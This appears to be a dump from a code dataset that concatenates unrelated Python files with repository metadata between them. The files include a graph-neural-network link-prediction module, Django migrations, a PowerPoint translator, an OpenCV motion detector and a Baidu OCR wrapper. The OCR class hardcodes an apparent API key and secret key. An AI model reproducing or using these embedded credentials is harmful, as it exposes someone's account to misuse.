def gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,
add_self_loops=False, dtype=None):
# type: (SparseTensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> SparseTensor # noqa
pass
def gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,
add_self_loops=True, dtype=None):
fill_value = 2. if improved else 1.
if isinstance(edge_index, SparseTensor):
adj_t = edge_index
if not adj_t.has_value():
adj_t = adj_t.fill_value(1., dtype=dtype)
if add_self_loops:
adj_t = fill_diag(adj_t, fill_value)
deg = sparse_sum(adj_t, dim=1)
deg_inv_sqrt = deg.pow_(-0.5)
deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0.)
adj_t = mul(adj_t, deg_inv_sqrt.view(-1, 1))
adj_t = mul(adj_t, deg_inv_sqrt.view(1, -1))
return adj_t
else:
num_nodes = maybe_num_nodes(edge_index, num_nodes)
if edge_weight is None:
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
if add_self_loops:
edge_index, tmp_edge_weight = add_remaining_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
assert tmp_edge_weight is not None
edge_weight = tmp_edge_weight
row, col = edge_index[0], edge_index[1]
deg = scatter_add(edge_weight, col, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow_(-0.5)
deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0)
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]
class TENET(nn.Module):
_cached_edge_index: Optional[Tuple[Tensor, Tensor]]
_cached_adj_t: Optional[SparseTensor]
def __init__(self, improved: bool = False, cached: bool = False,
add_self_loops: bool = True, normalize: bool = True, **kwargs):
super(TENET, self).__init__(**kwargs)
self.improved = improved
self.cached = cached
self.add_self_loops = add_self_loops
self.normalize = normalize
self._cached_edge_index = None
self._cached_adj_t = None
self.r_scaling_1, self.r_bias_1 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
self.r_scaling_2, self.r_bias_2 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
self.r_scaling_3, self.r_bias_3 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
self.r_scaling_4, self.r_bias_4 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
self.r_scaling_5, self.r_bias_5 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
self.cache = {
"num_updated": 0,
"edge_score": None, # Use as sij for edge score.
"edge_label": None, # Use as label for sij for supervision.
"new_edge": None,
}
self.reset_parameters()
def reset_parameters(self):
self._cached_edge_index = None
self._cached_adj_t = None
for name, param in self.named_parameters():
if name.startswith("r_scaling"):
tgi.ones(param)
elif name.startswith("r_bias"):
tgi.zeros(param)
def forward(self, x: Tensor, edge_index: Adj,
edge_weight: OptTensor = None):
if self.normalize:
if isinstance(edge_index, Tensor):
cache = self._cached_edge_index
if cache is None:
edge_index, edge_weight = gcn_norm( # yapf: disable
edge_index, edge_weight, x.size(-2),
self.improved, self.add_self_loops, dtype=x.dtype)
if self.cached:
self._cached_edge_index = (edge_index, edge_weight)
else:
edge_index, edge_weight = cache[0], cache[1]
elif isinstance(edge_index, SparseTensor):
cache = self._cached_adj_t
if cache is None:
edge_index = gcn_norm( # yapf: disable
edge_index, edge_weight, x.size(-2),
self.improved, self.add_self_loops, dtype=x.dtype)
if self.cached:
self._cached_adj_t = edge_index
else:
edge_index = cache
if self.training:
num_neg_samples = int(edge_index.size(1))
neg_edge_index = negative_sampling(
edge_index=edge_index,
num_nodes=x.size(0),
num_neg_samples=num_neg_samples,
)
edge_score, edge_label, new_edge = self._get_edge_score_and_edge_label(x, edge_index, neg_edge_index)
self._update_cache("edge_score", edge_score)
self._update_cache("edge_label", edge_label)
self._update_cache("new_edge", new_edge)
return edge_score, edge_label
else:
return None, None
def _update_cache(self, key, val):
self.cache[key] = val
self.cache["num_updated"] += 1
def __repr__(self):
return '{}'.format(self.__class__.__name__)
def _get_edge_score(self, x_i, x_j) -> torch.Tensor:
"""
:param x_i: [E, F]
:param x_j: [E, F]
"""
edge_score = torch.einsum("ef,ef->e", x_i, x_j)
edge_score = self.r_scaling_1 * F.elu(edge_score) + self.r_bias_1
# edge_score = self.r_scaling_2 * F.elu(edge_score) + self.r_bias_2
# edge_score = self.r_scaling_3 * F.elu(edge_score) + self.r_bias_3
# edge_score = self.r_scaling_4 * F.elu(edge_score) + self.r_bias_4
# edge_score = self.r_scaling_5 * F.elu(edge_score) + self.r_bias_5
# print('TOP', self.r_scaling_1, self.r_bias_1)
return edge_score
def _get_edge_score_and_edge_label(self, x, pos_edge_index, neg_edge_index):
"""
:param pos_edge_index: [2, E]
:param neg_edge_index: [2, neg_E]]
:return: [E + neg_E, 1]
"""
total_edge_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1) # [2, E + neg_E]
total_edge_index_j, total_edge_index_i = total_edge_index # [E + neg_E]
x_i = torch.index_select(input=x, dim=0, index=total_edge_index_i) # [E + neg_E, heads * F]
x_j = torch.index_select(input=x, dim=0, index=total_edge_index_j) # [E + neg_E, heads * F]
edge_score = self._get_edge_score(x_i, x_j)
edge_label = torch.zeros_like(edge_score)
edge_label[:pos_edge_index.size(1)] = 1
edge_mask = edge_score > 10
edge_mask = edge_mask[pos_edge_index.size(1):]
new_edge = neg_edge_index[:, edge_mask]
return edge_score, edge_label, new_edge
@staticmethod
def get_link_prediction_loss(model):
loss_list = []
cache_list = [(m, m.cache) for m in model.modules() if m.__class__.__name__ == TENET.__name__]
device = next(model.parameters()).device
criterion = BCEWithLogitsLoss()
for i, (module, cache) in enumerate(cache_list):
score = cache["edge_score"]
label = cache["edge_label"]
num_total_samples = score.size(0)
permuted = torch.randperm(num_total_samples)
permuted = permuted.to(device)
# print('Link pred loss: label[permuted]', label[permuted], label[permuted].shape)
# print(label[label>0], label[label>0].shape)
loss = criterion(score[permuted], label[permuted])
loss_list.append(loss)
del permuted
return sum(loss_list)
def get_edge_score(self, x, edge_index):
edge_index_j, edge_index_i = edge_index # [E + neg_E]
x_i = torch.index_select(input=x, dim=0, index=edge_index_i) # [E + neg_E, heads * F]
x_j = torch.index_select(input=x, dim=0, index=edge_index_j) # [E + neg_E, heads * F]
edge_score = self._get_edge_score(x_i, x_j)
return edge_score | [
"theorist17@gmail.com"
] | theorist17@gmail.com |
f0b6216d9f24d8fc4314980d5252ce702b88ae78 | e36c447b493ea3c311d022e39e2d70c743a12fd0 | /cloudevents/http/util.py | e3c2c82651231020a674038d3cf40c722393b40f | [
"Apache-2.0"
] | permissive | maartends/sdk-python | 079c027629840245ea479ddc1b82fdca64b41483 | 705e8b41004dba4f9a2dda0993205f9d610c7161 | refs/heads/master | 2023-07-17T18:57:08.008167 | 2021-09-02T22:58:52 | 2021-09-02T22:58:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | import json
import typing
def default_marshaller(content: any):
if content is None:
return None
try:
return json.dumps(content)
except TypeError:
return content
def _json_or_string(content: typing.Union[str, bytes]):
if content is None:
return None
try:
return json.loads(content)
except (json.JSONDecodeError, TypeError):
return content
| [
"noreply@github.com"
] | noreply@github.com |
907454d9dea139929257601be42857808d6f7e5f | ff9317f4aaf98cb2c734136309aaea72285dd263 | /min_max.py | 37108c50fe6db2848fa89d965953b1af3dbf02f6 | [] | no_license | nblv1/1102 | 0179f84e286e26c79b559be082118d85253b117d | 26ac926714319b50ac5bf49e7e64a4e418681eb5 | refs/heads/master | 2021-05-01T10:50:44.004068 | 2018-02-25T20:19:29 | 2018-02-25T20:19:29 | 121,108,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import random
random.random()
import random
import math
random.random()
a =[10,19,200,8899,28,990,29,0.1,19, 0.002, 1000,2]
max(a)
b=max(a)//random.random()
print (max(a), random.random(), b) | [
"n.burban.v@gmail.com"
] | n.burban.v@gmail.com |
0071f862ae6ac7cc325b86470569b65e63a044cd | 573ae6c6056dedcac2f806a232026738f2193ccd | /about/migrations/0002_auto_20170627_1702.py | ec18052858f650573f1a243a84eb94379df54f59 | [] | no_license | HuaEla/web | b04c6676e3f2083eb8e605fbdc02c4748fdc68e3 | cde55ed487241f1557aedcd11c5aa9dde87031c9 | refs/heads/master | 2020-12-02T22:54:38.889881 | 2017-07-11T02:18:33 | 2017-07-11T02:18:33 | 96,199,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-27 09:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('about', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='superprofile',
old_name='name',
new_name='firstname',
),
]
| [
"894589363@qq.com"
] | 894589363@qq.com |
9552d20ca11425a227f4e404a2ba143391495cc5 | b9abf8417bda70aa978217d42ec843cadf8be7da | /ex032.py | 79257ad2efda32fa8c172b126d8f8da90d37aa8d | [] | no_license | TheDarktor/Ex-Python | d6fadcbf580e6b5a0d7848255f53c7f3a5f1d7ae | 1419f9a7ab3ff3366d89bc954e69abeb0b111fb9 | refs/heads/master | 2020-12-15T18:07:05.670700 | 2020-09-24T16:27:48 | 2020-09-24T16:27:48 | 235,204,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | # Faça um programa que leia três números e mostre qual é o maior e qual é o menor.
n1 = int(input('Digite um número: '))
n2 = int(input('Digite um número: '))
n3 = int(input('Digite um número: '))
if n1 < n2 and n1 < n3:
menor = int(n1)
if n2 < n1 and n2 < n3:
menor = int(n2)
if n3 < n1 and n3 < n2:
menor = int(n3)
# --------------------------------------------
if n1 > n2 and n1 > n3:
maior = int(n1)
if n2 > n1 and n2 > n3:
maior = int(n2)
if n3 > n1 and n3 > n2:
maior = int(n3)
print('O menor número é {} e o maior é {}'.format(menor, maior))
| [
"noreply@github.com"
] | noreply@github.com |
b2bc3bca8d52e455d033d36e0bb434645d4a2414 | 112767762a536eabbfd361fb4ad9223abb9bee48 | /ppt_translator.py | 697c6886c869f01b8bd2b9832e2377da430ad60a | [] | no_license | bbiyongel/ppt_translator | af7872d10e5133ad0b872b49d91bab6e607e92ff | f5a506bd9d036ff3425fcb6c201dea85c36ffb55 | refs/heads/master | 2022-03-17T08:28:07.403129 | 2019-11-22T10:31:31 | 2019-11-22T10:31:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,025 | py | ## ppt_translator:
# A python script for translating a .ppt or .pptx file
## Setup:
# 1) Run file.reg to enable drag-and-drop conversion.
# 2) Install necessary Python 3.8 dependencies (i.e. pptx, googletrans, pandas,).
# 3) Drag and drop .ppt or .pptx file on top of ppt_translator.py.
# 4) Specify target language.
# 5) Open translated document!
## To do:
# preserve page numbers
# access hidden text frames
# give glossary lang labels
# highlight translated content for dubious translations
# if font is larger check if font of next run matches to concatenate
# replace "& \n" and "&\n" with "& "
## Troubleshooting:
# 1) JSONDecodeError: Expecting value: line 1 column 1 (char 0)
# Is usually caused because your IP address has been blocked by google.
# Try changing your IP address with a vpn or wait awhile.
# 2) TypeError: 'NoneType' object is not iterable
# Could be caused by extra spaces or weird characters within the powerpoint.
# -*- coding: utf-8 -*-
#! python3
# Dependencies:
from pptx import Presentation
from pptx.util import Pt
from googletrans import Translator
from googletrans.constants import LANGUAGES
import pandas
import os
import sys
import re
##2nd Level Helper Function
##takes input text
##returns input text translated to tgtLang
def translate_text(input_text, tgtLang):
print()
print("1")
print(input_text)
# input_text already translated
if input_text in query_dict:
output = query_dict[input_text]
# input_text in glossary.EN:
elif input_text in EN_glossary_as_list:
output = ZH_glossary_as_list[EN_glossary_as_list.index(input_text)]
# input_text in glossary.ZH:
elif input_text in ZH_glossary_as_list:
output = EN_glossary_as_list[ZH_glossary_as_list.index(input_text)]
# input_text is empty
elif input_text == "":
output = input_text
# input_text is skippable characters
elif skip_regex.match(input_text):
output = input_text
# input_text is spaces
elif space_regex.match(input_text):
output = input_text
# detected lang != srcLang -> skip translation if
elif srcLang != translator.detect(input_text).lang:
output = input_text
# google translation is necessary
else:
# remove ending spaces
while space_regex.match(input_text[-1]):
input_text = input_text[:-1]
# remove leading spaces
while space_regex.match(input_text[0]):
input_text = input_text[1:]
# remove double spaces
while re.search(" ", input_text):
input_text = input_text.Replace(" ", " ")
print("2")
print(input_text)
# check if glossary can be referenced for en->zh-cn translation
if srcLang == "en" and tgtLang == "zh-cn":
# iterator to check input for matches with glossary.EN
i = 0
length = len(glossary.EN)
while i < length:
term_EN = glossary.EN[i]
term_ZH = glossary.ZH[i]
# find each occurence of term_EN
##add "flags=re.IGNORECASE" to turn on case sensitivity##
parts = re.split(term_EN, input_text)
# replace matches w/ term_ZH
input_text = term_ZH.join(parts)
i += 1
# check if glossary can be referenced for zh-cn->en translation
elif srcLang == "zh-cn" and tgtLang == "en":
# iterator to check input for matches with glossary.EN
i = 0
length = len(glossary.ZH)
while i < length:
term_EN = glossary.EN[i]
term_ZH = glossary.ZH[i]
# find each occurence of term_ZH
parts = input_text.split(term_ZH)
# replace matches w/ term_ZH
input_text = term_EN.join(parts)
i += 1
print("3")
print(input_text)
print(srcLang)
#TRANSLATE input_text to tgtLang
output_raw = translator.translate(input_text, src=srcLang, dest=tgtLang)
output = output_raw.text
print("4")
print(output)
print("\n")
# save input_text and output to dictionary
query_dict[input_text] = output
return output
##1st Level Helper Function
def translate_ppt(pptfname, tgtLang):
prs = Presentation(pptfname)
prs.save(pre + "_" + tgtLang + ext)
for slide in prs.slides:
#PROGRESS LOGGING
curr_slide_num = prs.slides.index(slide)
total_slide_num = len(prs.slides)
string1 = ("Translating slide [{0}] \r".format(str(curr_slide_num + 1) +" / "+str(total_slide_num)))
sys.stdout.write(string1)
sys.stdout.flush()
for shape in slide.shapes:
##if table
if shape.has_table:
table = shape.table
for cell in table.iter_cells():
for paragraph in cell.text_frame.paragraphs:
paragraphsaved = paragraph
#READ
read_text = paragraphsaved.text
read_font_size = paragraphsaved.font.size
is_bold = paragraphsaved.font.bold
is_italic = paragraphsaved.font.italic
font_color = None
read_font = paragraphsaved.font
if not paragraphsaved.font.color.type == None:
font_color = read_run.font.color.theme_color
# TRANSLATE:
translated_text = translate_text(read_text, tgtLang)
prs.save(pre + "_" + tgtLang + ext)
paragraph.clear()
# NEWRUN:
write_run = paragraph.add_run()
write_run.text = translated_text
# WRITE:
font = write_run.font
font.size = read_font_size
font.bold = is_bold
font.italic = is_italic
if not read_run.font.color.type == None:
font.color.theme_color = font_color
#continue
##if no text frame
if not shape.has_text_frame:
continue
#if text frame
for paragraph in shape.text_frame.paragraphs:
paragraphRuns = paragraph.runs
paragraph.clear()
for read_run in paragraphRuns:
#READ
read_text = read_run.text
read_font_size = read_run.font.size
is_bold = read_run.font.bold
is_italic = read_run.font.italic
font_color = None
read_font = read_run.font
if not read_run.font.color.type == None:
font_color = read_run.font.color.theme_color
# TRANSLATE:
translated_text = translate_text(read_text, tgtLang)##error prone##
prs.save(pre + "_" + tgtLang + ext)
# NEWRUN:
write_run = paragraph.add_run()
write_run.text = translated_text
# WRITE:
font = write_run.font
font.size = read_font_size
font.bold = is_bold
font.italic = is_italic
if not read_run.font.color.type == None:
font.color.theme_color = font_color
prs.save(pre + "_" + tgtLang + ext)
##MAIN##
#prevents command line from exiting upon error
def show_exception_and_exit(exc_type, exc_value, tb):
import traceback
traceback.print_exception(exc_type, exc_value, tb)
input("Press <return> to exit...")
sys.exit(-1)
sys.excepthook = show_exception_and_exit
# takes argv[1] as fileDir
if len(sys.argv) > 1:
fileDir = sys.argv[1]
print(fileDir)
print()
else:
raise Exception('To translate, drag and drop a ppt or pptx file onto ppt_translator.py!')
# import glossary.csv
cwd = os.path.dirname(os.path.realpath(__file__))
glossary_abs_dir = os.path.join(cwd, "glossary.csv")
###convert glossary.csv columns to lists for quick lookup
glossary = pandas.read_csv(glossary_abs_dir, names=['ZH','EN'])
ZH_glossary_as_list = glossary.ZH.values.tolist()
EN_glossary_as_list = glossary.EN.values.tolist()
###TODO: allow for multiple columns/languages
# regex for skipping spaces, tabs and empty strings
skip_regex = re.compile(r'''(
[ 1234567890-_+=!@#$%^&*()[]{}"':;.,/?<>~`—]+
)''', re.VERBOSE)
space_regex = re.compile(r'''(
[\s]+
)''', re.VERBOSE)
# establish translator function
translator = Translator()
#dictionary for searched srcLang tgtLang data
query_dict ={}
#check if file is ppt or pptx
pre, ext = os.path.splitext(fileDir)
if ext == '.pptx' or ext == '.ppt':
srcLang = input("\nSource language?\n(press <return> for input detection)\n" )
tgtLang = input("\nTarget language?\n" )
srcLang = srcLang.lower()
tgtLang = tgtLang.lower()
for k, v in LANGUAGES.items():
if tgtLang == v:
tgtLang = k
if tgtLang == k:
tgtLang = k
# while loop to make sure tgtLang variable is contained in LANGUAGES
while tgtLang not in LANGUAGES:
print("\n")
for v in LANGUAGES.values():
print(v)
tgtLang = input("\nPlease choose one of the target languages above.\n" )
tgtLang = tgtLang.lower()
for k, v in LANGUAGES.items():
if tgtLang == v:
tgtLang = k
if tgtLang == k:
tgtLang = k
for k, v in LANGUAGES.items():
if srcLang == v:
srcLang = k
if srcLang == k:
srcLang = k
# while loop to make sure tgtLang variable is contained in LANGUAGES
while srcLang not in LANGUAGES:
print("\n")
for v in LANGUAGES.values():
print(v)
srcLang = input("\nPlease choose one of the target languages above.\n" )
srcLang = srcLang.lower()
for k, v in LANGUAGES.items():
if srcLang == v:
srcLang = k
if srcLang == k:
srcLang = k
#translate ppt
translate_ppt(fileDir, tgtLang)
| [
"noreply@github.com"
] | noreply@github.com |
46b27ee5bba75e2224f1978fca595c6d497705d3 | 86ac9ab4b947c959742eaf0fdc4eebf7b670c3f3 | /motion_detector.py | bd30ed3bd2ee2ef9884756af5565ef17013c0ce8 | [] | no_license | CBlagden/PhysicsFun | fc8f0c139d8feefeb5f26639cabbc204061399d3 | 21ec816c82380390b3e31d790ec27b7b76320727 | refs/heads/master | 2020-03-26T17:46:44.271544 | 2018-11-16T23:44:39 | 2018-11-16T23:44:39 | 145,179,878 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,905 | py | # import the necessary packages
from imutils.video import VideoStream
import argparse
import datetime
import imutils
import time
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", help="path to the video file")
ap.add_argument("-a", "--min-area", type=int, default=500, help="minimum area size")
args = vars(ap.parse_args())
# if the video argument is None, then we are reading from webcam
if args.get("video", None) is None:
vs = VideoStream(src=0).start()
time.sleep(2.0)
# otherwise, we are reading from a video file
else:
vs = cv2.VideoCapture(args["video"])
# initialize the first frame in the video stream
firstFrame = None
# loop over the frames of the video
while True:
# grab the current frame and initialize the occupied/unoccupied
# text
frame = vs.read()
frame = frame if args.get("video", None) is None else frame[1]
text = "Unoccupied"
# if the frame could not be grabbed, then we have reached the end
# of the video
if frame is None:
break
# resize the frame, convert it to grayscale, and blur it
frame = imutils.resize(frame, width=500)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21, 21), 0)
# if the first frame is None, initialize it
if firstFrame is None:
firstFrame = gray
continue
# compute the absolute difference between the current frame and
# first frame
frameDelta = cv2.absdiff(firstFrame, gray)
thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]
# dilate the thresholded image to fill in holes, then find contours
# on thresholded image
thresh = cv2.dilate(thresh, None, iterations=2)
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
# loop over the contours
for c in cnts:
# if the contour is too small, ignore it
if cv2.contourArea(c) < args["min_area"]:
continue
# compute the bounding box for the contour, draw it on the frame,
# and update the text
(x, y, w, h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
text = "Occupied"
# draw the text and timestamp on the frame
cv2.putText(frame, "Room Status: {}".format(text), (10, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
cv2.putText(frame, datetime.datetime.now().strftime("%A %d %B %Y %I:%M:%S%p"),
(10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# show the frame and record if the user presses a key
cv2.imshow("Security Feed", frame)
cv2.imshow("Thresh", thresh)
cv2.imshow("Frame Delta", frameDelta)
key = cv2.waitKey(1) & 0xFF
# if the `q` key is pressed, break from the lop
if key == ord("q"):
break
# cleanup the camera and close any open windows
vs.stop() if args.get("video", None) is None else vs.release()
cv2.destroyAllWindows() | [
"chase.blagden@gmail.com"
] | chase.blagden@gmail.com |
88c15922e1ee75ebfb41e099ea00d47e724e76b3 | 1118aec39a839da2ebc508f1d2a6b377aa70274d | /src/package/__init__.py | 9fe1791f5d03e16137cad53f29e2539c8bf69b31 | [] | no_license | serg0987/python | b3a9a2b22b4ef5a39e612a0a170ba9629933c802 | 074449ad6b3a90352939c55a9db37bd248cab428 | refs/heads/master | 2020-05-15T09:30:17.500158 | 2015-10-18T21:28:08 | 2015-10-18T21:28:08 | 2,454,952 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | '''
Created on Dec 16, 2011
@author: serg
'''
init = 'INIT' | [
"serg0987@gmail.com"
] | serg0987@gmail.com |
6b8be3ce5a2307b8c3529e0eb27f4790497e0059 | 5eb29ce7104e10a399d9afd7e253f029bf8bc0ff | /scripts/tests/test_get_sim.py | fd8d224e2bcce56d015705e64cd8d67421aa30a1 | [
"BSD-2-Clause"
] | permissive | svebk/DeepSentiBank_memex | 69789dc09316e97aad711edeb251837a60184e7e | 4e69ce66e3a177817ff360ddc263f55c6e0b63f7 | refs/heads/master | 2021-01-18T18:55:10.870052 | 2017-10-19T22:51:29 | 2017-10-19T22:51:29 | 36,091,024 | 22 | 1 | null | 2017-02-09T20:31:20 | 2015-05-22T19:20:54 | Python | UTF-8 | Python | false | false | 350 | py | import happybase
if __name__=="__main__":
tab_image = 'escorts_images_similar_row'
conn = happybase.Connection(host='10.1.94.57')
image_sha1s = '1000013C0A38D8DACAEC31360AFAFEB5DC3D712B'
table = conn.table(tab_image)
row = table.row(image_sha1s,columns=['s'])
print len(row.keys()),[x.split(':')[-1] for x in row.keys()]
| [
"svebor.karaman@gmail.com"
] | svebor.karaman@gmail.com |
b61ce073d9bde964a62fc5156e853ebf5fdb4439 | ce9593eb4ec109b86f3f75ac161a372e6d99f067 | /Problems/Make the function work/main.py | 587662f9829f06fd6bc6ba0c9f8c123d4beb5563 | [] | no_license | wangpengda1210/Rock-Paper-Scissors | 0b2e5ef9b946dd209a85fa7440a7e40acfd83923 | 05c558ddfdf69eb4170185a158ded8a3a063359c | refs/heads/main | 2023-02-20T08:35:09.379752 | 2021-01-23T06:31:48 | 2021-01-23T06:31:48 | 332,143,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | def closest_higher_mod_5(x):
while True:
if x % 5 == 0:
return x
x += 1
| [
"515484505@qq.com"
] | 515484505@qq.com |
d7c13d81e2288f3406197df838462de7876c6ad2 | 0f4168b2c87ad8b947f3442a978349edd7641e5c | /fspider/migrations/0004_office_shop_villa.py | b5f491845408080c488f912efa5c83142e20770c | [] | no_license | VegetaPn/fangSpider | 056fb8d95d2e340d8f8f07c738d3bfeb463dfac5 | 3180340e984e07a670953333a096bf69c926552d | refs/heads/master | 2021-03-16T05:11:03.871178 | 2017-07-15T13:35:56 | 2017-07-15T13:35:56 | 76,744,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,036 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-12-17 17:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fspider', '0003_auto_20161217_1721'),
]
operations = [
migrations.CreateModel(
name='Office',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(default='N/A', max_length=100)),
('category', models.CharField(default='N/A', max_length=100)),
('area', models.IntegerField(default=0)),
('parking', models.CharField(default='N/A', max_length=100)),
('href', models.CharField(default='', max_length=200)),
],
),
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(default='N/A', max_length=100)),
('category', models.CharField(default='N/A', max_length=100)),
('area', models.IntegerField(default=0)),
('parking', models.CharField(default='N/A', max_length=100)),
('href', models.CharField(default='', max_length=200)),
],
),
migrations.CreateModel(
name='Villa',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(default='N/A', max_length=100)),
('area', models.IntegerField(default=0)),
('households', models.IntegerField(default=0)),
('volume_rate', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
('greening_rate', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
('href', models.CharField(default='', max_length=200)),
],
),
]
| [
"yhnkb@hotmail.com"
] | yhnkb@hotmail.com |
e2e8ea110fb7113babc05ea998d5e8b5d26b5b25 | bb71682eb72b8f9a94a1c4c637f8d07e5239d63b | /Study/ITP1_2_C.py | c7415ebb0177ae742394b0783e6942adf34e08bf | [] | no_license | mao12312/AtCoder | 42d090c9dc48dbbe3ff0143b3946f76013704430 | f6db9b526612a37b1867e468dcec3aa84683786e | refs/heads/master | 2022-12-09T04:09:25.513094 | 2020-09-09T14:18:21 | 2020-09-09T14:18:21 | 259,569,529 | 0 | 0 | null | 2020-05-04T08:11:53 | 2020-04-28T07:55:11 | Python | UTF-8 | Python | false | false | 82 | py | nums = list(map(int,input().split()))
nums.sort()
print(nums[0], nums[1], nums[2]) | [
"42489486+mao12312@users.noreply.github.com"
] | 42489486+mao12312@users.noreply.github.com |
4f124bdf2b94619bb4c7de233059c280e56995a2 | 06ce40aa98c04ae61ce9a819a30f39202daca03b | /app/utils/file.py | 89e202eb654668770b2d1c6e2bbab7d28a9f7e08 | [] | no_license | sjquant/engster-server | 85d87a1f62c21830c460cb9076a24f236f3b1ea8 | d1d10c03326b9ca4b6db93ead7f85cf65b5ca9f4 | refs/heads/master | 2022-06-18T20:24:55.147620 | 2022-06-08T02:07:37 | 2022-06-08T02:07:37 | 163,208,699 | 3 | 0 | null | 2022-06-08T02:07:39 | 2018-12-26T18:54:19 | Python | UTF-8 | Python | false | false | 173 | py | def get_file_url(path: str, *, file_host: str = "127.0.0.1"):
if not path or path.startswith("http"):
return path
else:
return f"{file_host}/{path}"
| [
"noreply@github.com"
] | noreply@github.com |
d3ebe3bd1b50178b1770182a771ae09b385c8aa0 | abae77a818c8aeff722cd3d9347b1a45ee8f783b | /spider_day1/spiders/Ocr.py | c39b9abd4340d9c697445c483453c91f5273af23 | [] | no_license | xiaoxiwu/spider | 4880beda7fff2f43a99ef0e9092a56a3974c54dc | 1ca87091b475bd19afc9673db575e6c23bdd626e | refs/heads/master | 2021-05-12T19:48:55.747679 | 2018-01-14T13:54:48 | 2018-01-14T13:54:48 | 117,100,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,881 | py | # -*- coding: utf-8 -*-
from aip import AipOcr
from PIL import Image
class PythonOcr(object):
AppID = "10689156"
APIKey = "2Vj4t2VfgVGRnnHCTWvRhprR"
SecretKey = "PoVonzeGr7O1rD4fOAA7nx0gF1pF1EzA"
AppName = "pythonOcr"
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
def readImgFile(self, imgPath):
with open(imgPath, 'rb') as fp:
return fp.read()
def ocrChar(self, imgPath):
# 图片数据
image = self.readImgFile(imgPath)
client = AipOcr(self.AppID, self.APIKey, self.SecretKey)
return client.basicAccurate(image)
def preConcert(self, img): # 对图片做预处理
width, height = img.size
threshold = 30
for i in range(0, width):
for j in range(0, height):
p = img.getpixel((i, j)) # 抽取每个像素点的像素
r, g, b = p
if r > threshold or g > threshold or b > threshold:
img.putpixel((i, j), self.WHITE)
else:
img.putpixel((i, j), self.BLACK)
# img.show()
# img.save("preFig.jpg")
return img
def remove_noise(self, img, window=1): # 对去除背景的图片做噪点处理
if window == 1:
window_x = [1, 0, 0, -1, 0]
window_y = [0, 1, 0, 0, -1]
elif window == 2:
window_x = [-1, 0, 1, -1, 0, 1, 1, -1, 0]
window_y = [-1, -1, -1, 1, 1, 1, 0, 0, 0]
width, height = img.size
for i in range(width):
for j in range(height):
box = []
for k in range(len(window_x)):
d_x = i + window_x[k]
d_y = j + window_y[k]
try:
d_point = img.getpixel((d_x, d_y))
if d_point == self.BLACK:
box.append(1)
else:
box.append(0)
except IndexError:
img.putpixel((i, j), self.WHITE)
continue
box.sort()
if len(box) == len(window_x):
mid = box[int(len(box) / 2)]
if mid == 1:
img.putpixel((i, j), self.BLACK)
else:
img.putpixel((i, j), self.WHITE)
img.save("mov_noise_fig.jpg")
return img
def ocrImg(self, orignalImg, tmpImg):
img = Image.open(orignalImg)
img = self.preConcert(img)
img.save(tmpImg)
result = self.ocrChar(tmpImg)
words = result['words_result']
return words[0]['words'], img
if __name__ == '__main__':
ocr = PythonOcr()
originalPtah = 'captcha.jpeg'
tmpPath = 'preFile.jpg'
print ocr.ocrImg(originalPtah, tmpPath)
| [
"xiaoxiwu2008@qq.com"
] | xiaoxiwu2008@qq.com |
b403abe996e3eb4e3e8eadc3a538e7f4a7a5bb92 | e68734297f9321c0f934daa629bea21eafbb15a3 | /stubs/homeassistant/util/color.pyi | 5a7cb0197527cf37ddbd1afb7ab5d517a71e012f | [
"MIT"
